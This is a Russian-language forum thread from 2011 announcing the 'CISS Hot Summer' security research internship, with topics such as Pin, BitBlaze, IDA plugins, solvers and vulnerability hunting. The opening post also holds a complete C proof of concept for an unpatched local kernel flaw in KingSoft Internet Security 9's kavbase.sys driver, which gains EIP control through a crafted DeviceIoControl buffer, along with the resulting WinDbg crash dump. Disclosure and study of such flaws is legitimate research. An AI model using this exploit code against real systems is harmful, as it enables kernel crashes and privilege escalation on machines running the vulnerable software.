CISS Hot Summer

Тема в разделе "WASM.HEAP", создана пользователем NTarakanov, 12 июл 2011.

  1. NTarakanov

    NTarakanov New Member

    Публикаций:
    0
    Регистрация:
    19 ноя 2010
    Сообщения:
    94
    Всем тем, кому нечего делать летом, и кто хочет получить реальные знания/опыт в сфере ИБ посвящается...

    Что из себя предствляет СISS Hot Summer?

    Это проект, который продолжается 1 июля до сентября месяца.

    В период проведения проекта будут сформулированы задания для каждого участника. Так же, будут назначены кураторы для каждого участника, которые будет отвечать на вопросы участников по заданиям, помогать правильно выбрать алгоритмы решения и всячески способствовать результативной работе участника.
    Так же, во время СISS Hot Summer будут проходить online конференции и мастер-классы, основные цели которых повышение уровня, как теоретических, так и практических знаний участников.
    Многие студенты, которые будут проходить университетскую практику в CISSRT, тоже могут принять участие в СISS Hot Summer.

    Задания будут даваться участникам индивидуально, в процессе обсуждения их интересов.
    Участник сам будет выбирать, над каким именно заданием он хочет работать.

    Все разработки ведутся по OpenSource методике, авторство кода сохраняется. Участник выбирает лицензию самостоятельно, по его личным предпочтениям(GPLv3, BSD, Apache и т.д.).


    Аспекты данной программы – исследование и разработка:

    1) Динамический анализ
    a. Pin plugins – трассировка, автоматизация детектора уязвимостей и т.д.
    b. BitBlaze – работа с Temu, написание плагинов, исследование тейнтирования.

    2) Статический анализ - IDA plugins

    a.differs: turbodiff, patchdiff, DarunGrim – усовершенствование текущих OpenSource «дифферов»
    b. различные "визуализаторы" – прорисовка трасс от различных трассироdщиков(Pin, temu и т.д.), оптимальные пути от точек и т.д.
    c.связывание Vine’a с IDA – IDAOCaml

    3) Исследование "решателей"Solvers - STP,Z3,SMT и т.д.

    4) Исследование отладчиков:
    a.плагины к Windbg,
    b.плагины к gdb ( Mac OS X, iOS)
    c.плагины к Immunity Debugger

    5) Поиск уязвимостей, исследование новых векторов атаки:
    a.ядро OS - от Windows до Cisco IOS
    b.пользовательские приложения

    По окончанию проекта, ВСЕ успешно выполненные задания будут вознаграждены денежными призами от 30000 до 100000 рублей.

    Все желающие поучаствовать или просто задать интересующий Вас вопрос, пишите на CISSHOTSUMMER@gmail.com или мне в PM!

    P.S.
    на закуску нульдей в китайском авере:
    Код (Text):
    1. /*
    2. # Exploit Title: KingSoft Internet Security 9 Plus 0day Local Kernel PoC
    3. # Date: 2011-07-12
    4. # Author: Nikita Tarakanov (CISS Research Team)
    5. # Software Link: http://www.kingsoftresearch.com/downloads/kis/kis.rar
    6. # Version: up to date kavbase.sys version 2009.6.17.160
    7. # Tested on: Win XP SP3
    8. # CVE : CVE-NO-MATCH
    9. # Status : Unpatched
    10. */
    11.  
    12.  
    13. #include <windows.h>
    14. #include <stdio.h>
    15. #include <stdlib.h>
    16.  
    17.  
    18. #define MALLOCSIZE 0x1000
    19. #define VULNIOCTL 0x20EC
    20.  
    21. int main(int argc, char **argv)
    22. {
    23.     HANDLE   hDevice;
    24.     DWORD    cb;
    25.     DWORD   *buff;
    26.     char    *buff_out;
    27.     int len = 0;
    28.     DWORD val = 0xDEADBEEF;
    29.     WORD padd= 0x0001;
    30.     int outlen = 0, inlen = 0;
    31.     char deviceName[] = "\\\\.\\kavbase";
    32.  
    33.    
    34.     if ( (hDevice = CreateFileA(deviceName,
    35.                           GENERIC_READ|GENERIC_WRITE,
    36.                           0,
    37.                           0,
    38.                           OPEN_EXISTING,
    39.                           0,
    40.                           NULL) ) != INVALID_HANDLE_VALUE )
    41.     {
    42.         printf("Device  succesfully opened %s!\n", deviceName);
    43.     }
    44.     else
    45.     {
    46.         printf("Error: Error opening device \n");
    47.         return 0;
    48.     }
    49.    
    50.     cb = 0;
    51.     buff = (DWORD*)malloc(MALLOCSIZE);
    52.     if(!buff){
    53.       printf("malloc failed");
    54.       return 0;
    55.     }
    56.     memset((char*)buff, 'A', MALLOCSIZE-1);
    57.  
    58.     buff[0x205] = 0xBBADC0DE;//EIP under our control
    59.  
    60.  
    61.     buff_out = (char*)malloc(MALLOCSIZE);
    62.     if(!buff_out){
    63.       printf("malloc failed");
    64.       return 0;
    65.     }
    66.     memset(buff_out, 'B', MALLOCSIZE-1);
    67.  
    68.     inlen = 0x818;
    69.     outlen = 0x818;
    70.     DeviceIoControl(hDevice, VULNIOCTL, (LPVOID)buff, inlen, (LPVOID)buff_out, outlen, &cb, NULL);
    71.  
    72.     printf("You wont see this!!!");
    73.     free(buff);
    74.     free(buff_out);
    75. }
    и собственно дамп:

    Код (Text):
    1. *** Fatal System Error: 0x00000050
    2.                        (0xBBADC0DE,0x00000008,0xBBADC0DE,0x00000002)
    3.  
    4.  
    5. BugCheck 50, {bbadc0de, 8, bbadc0de, 2}
    6.  
    7. Probably caused by : hardware
    8.  
    9. Followup: MachineOwner
    10. ---------
    11.  *** Possible invalid call from 80605409 ( nt!ExMapHandleToPointer+0xb1 )
    12.  *** Expected target 8052946a ( nt!RtlWalkFrameChain+0x0 )
    13.  
    14. nt!RtlpBreakWithStatusInstruction:
    15. 80527c0c cc              int     3
    16. kd> !analyze -v
    17. *******************************************************************************
    18. *                                                                             *
    19. *                        Bugcheck Analysis                                    *
    20. *                                                                             *
    21. *******************************************************************************
    22.  
    23. PAGE_FAULT_IN_NONPAGED_AREA (50)
    24. Invalid system memory was referenced.  This cannot be protected by try-except,
    25. it must be protected by a Probe.  Typically the address is just plain bad or it
    26. is pointing at freed memory.
    27. Arguments:
    28. Arg1: bbadc0de, memory referenced.
    29. Arg2: 00000008, value 0 = read operation, 1 = write operation.
    30. Arg3: bbadc0de, If non-zero, the instruction address which referenced the bad memory
    31.     address.
    32. Arg4: 00000002, (reserved)
    33.  
    34. Debugging Details:
    35. ------------------
    36.  
    37.  
    38.  
    39. WRITE_ADDRESS:  bbadc0de Paged session pool
    40.  
    41. FAULTING_IP:
    42. +152952f00badfdc
    43. bbadc0de ??              ???
    44.  
    45. MM_INTERNAL_CODE:  2
    46.  
    47. DEFAULT_BUCKET_ID:  INTEL_CPU_MICROCODE_ZERO
    48.  
    49. BUGCHECK_STR:  0x50
    50.  
    51. PROCESS_NAME:  KingSoft_IS9_poc.exe
    52.  
    53. TRAP_FRAME:  f4515ba0 -- (.trap 0xfffffffff4515ba0)
    54. ErrCode = 00000010
    55. eax=c0000001 ebx=81d91900 ecx=00000000 edx=f4515b00 esi=81ad4268 edi=81ce89b0
    56. eip=bbadc0de esp=f4515c14 ebp=41414141 iopl=0         nv up ei ng nz ac pe nc
    57. cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010296
    58. bbadc0de ??              ???
    59. Resetting default scope
    60.  
    61. LAST_CONTROL_TRANSFER:  from 8060540e to bbadc0de
    62.  
    63. POSSIBLE_INVALID_CONTROL_TRANSFER:  from 80605409 to 8052946a
    64.  
    65. STACK_TEXT:  
    66. WARNING: Frame IP not in any known module. Following frames may be wrong.
    67. f4515c10 8060540e 00000818 00000000 81d9d460 0xbbadc0de
    68. f4515c34 804ee129 81d9d3a8 81d91900 806d2070 nt!ExMapHandleToPointer+0xb6
    69. f4515c44 80574e56 81d91970 81ce89b0 81d91900 nt!IopfCallDriver+0x31
    70. f4515c58 80575d11 81d9d3a8 81d91900 81ce89b0 nt!IopSynchronousServiceTail+0x70
    71. f4515d00 8056e57c 000007e8 00000000 00000000 nt!IopXxxControlFile+0x5e7
    72. f4515d34 8053d6d8 000007e8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
    73. f4515d34 7c90e514 000007e8 00000000 00000000 nt!KiFastCallEntry+0xf8
    74. 0012ff1c 004099c6 000007e8 000020ec 00344e90 ntdll!KiFastSystemCallRet
    75. 0012ff78 0040141e 00000001 00342f90 00342fb0 KingSoft_IS9_poc!main+0x156
    76. 0012ffc0 7c817077 bec19574 01cc4039 7ffd6000 KingSoft_IS9_poc!__tmainCRTStartup+0xfb
    77. 0012fff0 00000000 00401475 00000000 78746341 kernel32!BaseProcessStart+0x23
     
  2. Orange

    Orange New Member

    Публикаций:
    0
    Регистрация:
    17 июл 2010
    Сообщения:
    37
    Видимо из-за своей излишней скромности, ТС не дал ссылку на компанию-организатора сего богоугодного мероприятия:

    http://cisscompany.com/
     
  3. Orange

    Orange New Member

    Публикаций:
    0
    Регистрация:
    17 июл 2010
    Сообщения:
    37
    Будьте добры, зопейшите их на видио и выложьте в Сети. Не все смогут учавствовать, атак было бы интересно посмотреть, и вам допалнительный пеар.
     
  4. Orange

    Orange New Member

    Публикаций:
    0
    Регистрация:
    17 июл 2010
    Сообщения:
    37
    Берете ли вы на практику студентов из загороницы (дальнее зарубежье)?
     
  5. NTarakanov

    NTarakanov New Member

    Публикаций:
    0
    Регистрация:
    19 ноя 2010
    Сообщения:
    94
    Orange
    Со временем, будут выкладываться различные материалы(презентации, статьи, видео), также в скором будущем предстоят вебинары(или видео подкасты, как их ещё называют).
     
  6. NTarakanov

    NTarakanov New Member

    Публикаций:
    0
    Регистрация:
    19 ноя 2010
    Сообщения:
    94
    Orange
    я думаю детали стоит обсудить в PM или e-mail.
     
  7. Husky_Head_2014

    Husky_Head_2014 New Member

    Публикаций:
    0
    Регистрация:
    28 фев 2010
    Сообщения:
    131
    NTarakanov
    Насколько я понимаю вы так называемые "белые" хакеры. Чем занимаются черношляпнеги всякому известно - пишут троев и взламывают сети. А про белые шляпы мало известно в наших краях. Посоветуйте, пожалуйста, хорошие книги/ресурсы на русском/английском чтобы разобраться, кто такие белые хакеры и что-там к чему.
     
  8. NTarakanov

    NTarakanov New Member

    Публикаций:
    0
    Регистрация:
    19 ноя 2010
    Сообщения:
    94
    Husky_Head_2014
    так называемые "белые" или whitehat хакеры занимаются тем же, что и черношляпнеги, только во благо.
    Ресурсы:блоги и презентации с различных конференций, книги сейчас,имхо, уже бесполезно читать - слишком быстро устаревает информация, которая в них.
     
  9. full_throttle

    full_throttle New Member

    Публикаций:
    0
    Регистрация:
    8 июл 2011
    Сообщения:
    4
    А деньги у войтхэдов откуда? Или мамка на обеды дает?
     
  10. NTarakanov

    NTarakanov New Member

    Публикаций:
    0
    Регистрация:
    19 ноя 2010
    Сообщения:
    94
    full_throttle
    Странный вопрос...
    От заказчиком, откуда ещё???